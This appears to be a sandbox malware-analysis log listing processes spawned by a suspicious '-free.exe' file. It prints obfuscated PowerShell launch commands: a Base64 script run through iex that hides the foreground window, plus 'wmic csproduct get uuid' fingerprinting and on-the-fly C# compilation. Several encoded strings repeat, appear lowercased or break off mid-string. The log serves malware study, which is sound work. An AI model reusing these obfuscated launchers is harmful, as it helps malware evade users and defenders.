      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: Base64 decoded [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"aWYgKC1ub3QgKFtTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTVHlwZU5hbWVdJ1dpbjMyJykuVHlwZSkgew0KICAgIEFkZC1UeXBlIEAiDQogICAgdXNpbmcgU3lzdGVtOw0KICAgIHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsNCg0KICAgIHB1YmxpYyBjbGFzcyBXaW4zMiB7DQogICAgICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0NCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldEZvcmVncm91bmRXaW5kb3coKTsNCg0KICAgICAgICBbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildDQogICAgICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQ0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7DQogICAgfQ0KIkANCn0NCmZ1bmN0aW9uIEdldEFjdGl2ZVdpbmRvd1RpdGxlKCkgew0KICAgICRoV25kID0gW1dpbjMyXTo6R2V0Rm9yZWdyb3VuZFdpbmRvdygpDQogICAgJHNiID0gTmV3LU9iamVjdCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKDI1NikNCiAgICBbV2luMzJdOjpHZXRXaW5kb3dUZXh0KCRoV25kLCAkc2IsICRzYi5DYXBhY2l0eSkgfCBPdXQtTnVsbA0KICAgIHJldHVybiAkc2IuVG9TdHJpbmcoKQ0KfQ0KZnVuY3Rpb24gSGlkZUFjdGl2ZVdpbmRvdygpIHsNCiAgICAkaFduZCA9IFtXaW4zMl06OkdldEZvcmVncm91bmRXaW5kb3coKQ0KICAgIFtXaW4zMl06OlNob3dXaW5kb3coJGhXbmQsIDApDQp9DQokY3VycmVudFdpbmRvd1RpdGxlID0gR2V0QWN0aXZlV2luZG93VGl0bGUNCkhpZGVBY3RpdmVXaW5kb3cNCg=="}' | ConvertFrom-Json).Script)) | iexJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get uuid /valueJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9CB.tmp" "c:\Users\user\AppData\Local\Temp\at4aznwk\CSC4E83F948CA91455DAC7F3163ADDBB8D.TMP"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE63E.tmp" "c:\Users\user\AppData\Local\Temp\f2b3v2t5\CSCCC5958D27FB74F62AE119AE083742021.TMP"Jump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encoded wwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacgajwb7aciauwbjahiaaqbwahqaiga6aciayqbxafkazwblaemamqb1agiamwbragcaswbgahqavablafgatgawafoavwawahuavabxaeyadqbzafcazabsagiavwbwahuazabdaduaqgbkafgaugb2agiavwbgadaayqbxadkadqbmagwaqgbuafyasabsahcawgbvaduaaabiafcavgbkaeoamqbkahaaygbqae0aeqbkahkaawb1afyasabsahcawgbtagsazwblahcamablaekaqwbbagcasqbfaeyaawbaaemamqbvaguawabcagwasqbfaeeaaqbeafeabwbnaekaqwbbagcazabyae4acabiag0aywbnafuamwbsahoazabhafyadabpahcamablaekaqwbbagcasqbiafyaegbhafcanqbuaekargboaduaywazafiababiafmanqbtagqavwa1adaayqbxadeababmagsabab1agqarwbwahkaygazaeiavabaafgasgayageavwboagwaywb6ahmatgbdagcamablaekaqwbbagcasqbiaeiamqbzag0aeabwafkaeqbcagoaygbhaeyaegbjahkaqgbyageavwa0ahoatqbpaeianwbeafeabwbnaekaqwbbagcasqbdaeeazwbjaeyadabfagiarwb4aeoaygbyaeiadgbjag4auqbvaekabgbwahoawgbyaekaegbnagkanqbragiarwb3agkaswbwadaatgbdagkaqqbnaekaqwbbagcasqbdaeeazwbjaegavgbpagiarwbsagoasqbiae4amabzafgaugbwafkaeqbcagwazqbiafiababjag0anabnafmavwa1adaavqbiafiaeqbjaeuazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmaywbvaesavabzae4aqwbnadaaswbjaemaqqbnaekaqwbbagcasqbdaeiaygbsaecaeabzafmavwaxahcaygazaeoamablaemasgaxagmamgbwahkatqb6aekadqbaaecaeabzaekaaqbsagqarabrag8azwbjaemaqqbnaekaqwbbagcasqbgahqaeqbaafgaugaxagmabqa0adyasqbfadeaaabjag4atgbvafkavwb4aeiaywb5aggavgbiag0amqboagiabqbgag4awgbxafiavqblafgaqgbsaewaawbkahyaygayahcacabyafeamablaekaqwbbagcasqbdaeeazwbjaemaqgb3agqavwbkahmayqbxae0azwbjadmaugboagqarwbsagoasqbhafyanabkaecavgb5agiaaqbcagkaygayadkacwbjaeyatgbvagiamwbkafgayqbxaduaawbiadmaywbvafmavwa1adaavqbiafiaeqbjaecaaabyagiabqbrahmasqbhagwadqbkaemaqgb1afeamgaxagsavqayaggadgbkahkaawa3aeqauqbvagcasqbdaeeazwbmafeamablaekaawbbae4aqwbuadaatgbdag0awgaxagiabqboadaayqbxadkadqbjaeuazabsagqarqbgagoazabhagwamgbaafyazabwagiabqbsahyazaaxafiacabkaecaeabsaesaqwbragcazqb3adaaswbjaemaqqbnaekaqwbsag8avgayaduaawbjaeqamabnafcamqbkahaaygbqae0aeqbyafqabwa2afiamgbwadaaugbtadkaeqbaafcazab5agiamwbwahuawgbgagqacabiag0augb2agqaeqbnahaarabrag8azwbjaemaqqbnaeoasaboagkasqbeadaazwbuag0avgazaewavqa5agkayqbtafyaagbkaemaqgbuaguawaboadaawgbxadaadqbwaecavga0agqaqwa1afqazabiaeoacabiag0azabdagqavwbsahmawgbhafyaeqblaeqasqaxae4aaqbrae4aqwbpaeeazwbjaemaqgbiafyamgbsahuatqb6aeoazabpagoacabiafoawabsafgayqbxaduaawbiadmazabvafoawaboadaaswbdafiabwbwadianqbraewaqwbbagsaywayaekacwbjaemaugb6afkaaqa1aeqawqbyaeiaaabzadiabaawaguauwbragcazgbdaeiauabkafgauqb0afqabgbwahmaygbbadaaswbjaemaqqbnaekasabkagwazabiafyaeqbiagkaqqbragmamgbjahuavgbhadkavabkaegasgbwagiabqbjag8aswbradaaswbmafeamablafoabgbwahuawqazafiacabiadianabnafmarwbsagsawgbvaeyaagbkaecabaayafoavgbkahaaygbtafiadgbkahkazwbwaekasabzae4aqwbpaeeazwbjaemaqqbrageargbkahuawgbdaeeaoqbjaeyadabyageavwa0ahoatqbsadaangbpagsazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmay
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encoded wwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacgajwb7aciauwbjahiaaqbwahqaiga6aciayqbxafkazwblaemamqb1agiamwbragcaswbgahqavablafgatgawafoavwawahuavabxaeyadqbzafcazabsagiavwbwahuazabdaduaqgbkafgaugb2agiavwbgadaayqbxadkadqbmagwaqgbuafyasabsahcawgbvaduaaabiafcavgbkaeoamqbkahaaygbqae0aeqbkahkaawb1afyasabsahcawgbtagsazwblahcamablaekaqwbbagcasqbfaeyaawbaaemamqbvaguawabcagwasqbfaeeaaqbeafeabwbnaekaqwbbagcazabyae4acabiag0aywbnafuamwbsahoazabhafyadabpahcamablaekaqwbbagcasqbiafyaegbhafcanqbuaekargboaduaywazafiababiafmanqbtagqavwa1adaayqbxadeababmagsabab1agqarwbwahkaygazaeiavabaafgasgayageavwboagwaywb6ahmatgbdagcamablaekaqwbbagcasqbiaeiamqbzag0aeabwafkaeqbcagoaygbhaeyaegbjahkaqgbyageavwa0ahoatqbpaeianwbeafeabwbnaekaqwbbagcasqbdaeeazwbjaeyadabfagiarwb4aeoaygbyaeiadgbjag4auqbvaekabgbwahoawgbyaekaegbnagkanqbragiarwb3agkaswbwadaatgbdagkaqqbnaekaqwbbagcasqbdaeeazwbjaegavgbpagiarwbsagoasqbiae4amabzafgaugbwafkaeqbcagwazqbiafiababjag0anabnafmavwa1adaavqbiafiaeqbjaeuazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmaywbvaesavabzae4aqwbnadaaswbjaemaqqbnaekaqwbbagcasqbdaeiaygbsaecaeabzafmavwaxahcaygazaeoamablaemasgaxagmamgbwahkatqb6aekadqbaaecaeabzaekaaqbsagqarabrag8azwbjaemaqqbnaekaqwbbagcasqbgahqaeqbaafgaugaxagmabqa0adyasqbfadeaaabjag4atgbvafkavwb4aeiaywb5aggavgbiag0amqboagiabqbgag4awgbxafiavqblafgaqgbsaewaawbkahyaygayahcacabyafeamablaekaqwbbagcasqbdaeeazwbjaemaqgb3agqavwbkahmayqbxae0azwbjadmaugboagqarwbsagoasqbhafyanabkaecavgb5agiaaqbcagkaygayadkacwbjaeyatgbvagiamwbkafgayqbxaduaawbiadmaywbvafmavwa1adaavqbiafiaeqbjaecaaabyagiabqbrahmasqbhagwadqbkaemaqgb1afeamgaxagsavqayaggadgbkahkaawa3aeqauqbvagcasqbdaeeazwbmafeamablaekaawbbae4aqwbuadaatgbdag0awgaxagiabqboadaayqbxadkadqbjaeuazabsagqarqbgagoazabhagwamgbaafyazabwagiabqbsahyazaaxafiacabkaecaeabsaesaqwbragcazqb3adaaswbjaemaqqbnaekaqwbsag8avgayaduaawbjaeqamabnafcamqbkahaaygbqae0aeqbyafqabwa2afiamgbwadaaugbtadkaeqbaafcazab5agiamwbwahuawgbgagqacabiag0augb2agqaeqbnahaarabrag8azwbjaemaqqbnaeoasaboagkasqbeadaazwbuag0avgazaewavqa5agkayqbtafyaagbkaemaqgbuaguawaboadaawgbxadaadqbwaecavga0agqaqwa1afqazabiaeoacabiag0azabdagqavwbsahmawgbhafyaeqblaeqasqaxae4aaqbrae4aqwbpaeeazwbjaemaqgbiafyamgbsahuatqb6aeoazabpagoacabiafoawabsafgayqbxaduaawbiadmazabvafoawaboadaaswbdafiabwbwadianqbraewaqwbbagsaywayaekacwbjaemaugb6afkaaqa1aeqawqbyaeiaaabzadiabaawaguauwbragcazgbdaeiauabkafgauqb0afqabgbwahmaygbbadaaswbjaemaqqbnaekasabkagwazabiafyaeqbiagkaqqbragmamgbjahuavgbhadkavabkaegasgbwagiabqbjag8aswbradaaswbmafeamablafoabgbwahuawqazafiacabiadianabnafmarwbsagsawgbvaeyaagbkaecabaayafoavgbkahaaygbtafiadgbkahkazwbwaekasabzae4aqwbpaeeazwbjaemaqqbrageargbkahuawgbdaeeaoqbjaeyadabyageavwa0ahoatqbsadaangbpagsazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmay
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encoded wwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacgajwb7aciauwbjahiaaqbwahqaiga6aciayqbxafkazwblaemamqb1agiamwbragcaswbgahqavablafgatgawafoavwawahuavabxaeyadqbzafcazabsagiavwbwahuazabdaduaqgbkafgaugb2agiavwbgadaayqbxadkadqbmagwaqgbuafyasabsahcawgbvaduaaabiafcavgbkaeoamqbkahaaygbqae0aeqbkahkaawb1afyasabsahcawgbtagsazwblahcamablaekaqwbbagcasqbfaeyaawbaaemamqbvaguawabcagwasqbfaeeaaqbeafeabwbnaekaqwbbagcazabyae4acabiag0aywbnafuamwbsahoazabhafyadabpahcamablaekaqwbbagcasqbiafyaegbhafcanqbuaekargboaduaywazafiababiafmanqbtagqavwa1adaayqbxadeababmagsabab1agqarwbwahkaygazaeiavabaafgasgayageavwboagwaywb6ahmatgbdagcamablaekaqwbbagcasqbiaeiamqbzag0aeabwafkaeqbcagoaygbhaeyaegbjahkaqgbyageavwa0ahoatqbpaeianwbeafeabwbnaekaqwbbagcasqbdaeeazwbjaeyadabfagiarwb4aeoaygbyaeiadgbjag4auqbvaekabgbwahoawgbyaekaegbnagkanqbragiarwb3agkaswbwadaatgbdagkaqqbnaekaqwbbagcasqbdaeeazwbjaegavgbpagiarwbsagoasqbiae4amabzafgaugbwafkaeqbcagwazqbiafiababjag0anabnafmavwa1adaavqbiafiaeqbjaeuazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmaywbvaesavabzae4aqwbnadaaswbjaemaqqbnaekaqwbbagcasqbdaeiaygbsaecaeabzafmavwaxahcaygazaeoamablaemasgaxagmamgbwahkatqb6aekadqbaaecaeabzaekaaqbsagqarabrag8azwbjaemaqqbnaekaqwbbagcasqbgahqaeqbaafgaugaxagmabqa0adyasqbfadeaaabjag4atgbvafkavwb4aeiaywb5aggavgbiag0amqboagiabqbgag4awgbxafiavqblafgaqgbsaewaawbkahyaygayahcacabyafeamablaekaqwbbagcasqbdaeeazwbjaemaqgb3agqavwbkahmayqbxae0azwbjadmaugboagqarwbsagoasqbhafyanabkaecavgb5agiaaqbcagkaygayadkacwbjaeyatgbvagiamwbkafgayqbxaduaawbiadmaywbvafmavwa1adaavqbiafiaeqbjaecaaabyagiabqbrahmasqbhagwadqbkaemaqgb1afeamgaxagsavqayaggadgbkahkaawa3aeqauqbvagcasqbdaeeazwbmafeamablaekaawbbae4aqwbuadaatgbdag0awgaxagiabqboadaayqbxadkadqbjaeuazabsagqarqbgagoazabhagwamgbaafyazabwagiabqbsahyazaaxafiacabkaecaeabsaesaqwbragcazqb3adaaswbjaemaqqbnaekaqwbsag8avgayaduaawbjaeqamabnafcamqbkahaaygbqae0aeqbyafqabwa2afiamgbwadaaugbtadkaeqbaafcazab5agiamwbwahuawgbgagqacabiag0augb2agqaeqbnahaarabrag8azwbjaemaqqbnaeoasaboagkasqbeadaazwbuag0avgazaewavqa5agkayqbtafyaagbkaemaqgbuaguawaboadaawgbxadaadqbwaecavga0agqaqwa1afqazabiaeoacabiag0azabdagqavwbsahmawgbhafyaeqblaeqasqaxae4aaqbrae4aqwbpaeeazwbjaemaqgbiafyamgbsahuatqb6aeoazabpagoacabiafoawabsafgayqbxaduaawbiadmazabvafoawaboadaaswbdafiabwbwadianqbraewaqwbbagsaywayaekacwbjaemaugb6afkaaqa1aeqawqbyaeiaaabzadiabaawaguauwbragcazgbdaeiauabkafgauqb0afqabgbwahmaygbbadaaswbjaemaqqbnaekasabkagwazabiafyaeqbiagkaqqbragmamgbjahuavgbhadkavabkaegasgbwagiabqbjag8aswbradaaswbmafeamablafoabgbwahuawqazafiacabiadianabnafmarwbsagsawgbvaeyaagbkaecabaayafoavgbkahaaygbtafiadgbkahkazwbwaekasabzae4aqwbpaeeazwbjaemaqqbrageargbkahuawgbdaeeaoqbjaeyadabyageavwa0ahoatqbsadaangbpagsazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmayJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encoded wwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacgajwb7aciauwbjahiaaqbwahqaiga6aciayqbxafkazwblaemamqb1agiamwbragcaswbgahqavablafgatgawafoavwawahuavabxaeyadqbzafcazabsagiavwbwahuazabdaduaqgbkafgaugb2agiavwbgadaayqbxadkadqbmagwaqgbuafyasabsahcawgbvaduaaabiafcavgbkaeoamqbkahaaygbqae0aeqbkahkaawb1afyasabsahcawgbtagsazwblahcamablaekaqwbbagcasqbfaeyaawbaaemamqbvaguawabcagwasqbfaeeaaqbeafeabwbnaekaqwbbagcazabyae4acabiag0aywbnafuamwbsahoazabhafyadabpahcamablaekaqwbbagcasqbiafyaegbhafcanqbuaekar